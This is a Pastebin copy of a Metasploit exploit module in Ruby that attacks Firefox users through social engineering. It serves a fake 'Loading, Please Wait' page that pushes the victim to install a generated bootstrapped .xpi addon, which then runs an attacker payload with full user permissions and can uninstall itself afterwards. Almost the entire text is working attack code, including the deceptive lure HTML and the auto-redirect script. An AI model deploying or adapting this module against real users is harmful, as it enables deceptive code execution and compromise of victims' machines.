Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##
- # This module requires Metasploit: http://metasploit.com/download
- # Current source: https://github.com/rapid7/metasploit-framework
- ##
- require 'msf/core'
- require 'rex'
- require 'rex/zip'
- class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
- include Msf::Exploit::Remote::HttpServer::HTML
- include Msf::Exploit::Remote::FirefoxAddonGenerator
- def initialize( info = {} )
- super( update_info( info,
- 'Name' => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
- 'Description' => %q{
- This exploit dynamically creates a .xpi addon file.
- The resulting bootstrapped Firefox addon is presented to
- the victim via a web page. The victim's Firefox browser
- will pop a dialog asking if they trust the addon.
- Once the user clicks "install", the addon is installed and
- executes the payload with full user permissions. As of Firefox
- 4, this will work without a restart as the addon is marked to
- be "bootstrapped". As the addon will execute the payload after
- each Firefox restart, an option can be given to automatically
- uninstall the addon once the payload has been executed.
- },
- 'License' => MSF_LICENSE,
- 'Author' => [ 'mihi', 'joev' ],
- 'References' =>
- [
- [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
- [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
- ],
- 'DisclosureDate' => 'Jun 27 2007'
- ))
- end
- def on_request_uri(cli, request)
- if request.uri.match(/\.xpi$/i)
- # browser has navigated to the .xpi file
- print_status("Sending xpi and waiting for user to click 'accept'...")
- if not xpi = generate_addon_xpi(cli)
- print_error("Failed to generate the payload.")
- send_not_found(cli)
- else
- send_response(cli, xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
- end
- else
- # initial browser request
- # force the user to access a directory-like URL
- if not request.uri.match(/\/$/)
- print_status("Redirecting request." )
- send_redirect(cli, "#{get_resource}/")
- else
- # user has navigated
- print_status("Sending response HTML." )
- send_response_html(cli, generate_html)
- end
- end
- handler(cli)
- end
- def generate_html
- html = %Q|<html><head><title>Loading, Please Wait...</title></head>\n|
- html << %Q|<body><center><p>Addon required to view this page. <a href="addon.xpi">[Install]</a></p></center>\n|
- html << %Q|<script>window.location.href="addon.xpi";</script>\n|
- html << %Q|</body></html>|
- return html
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement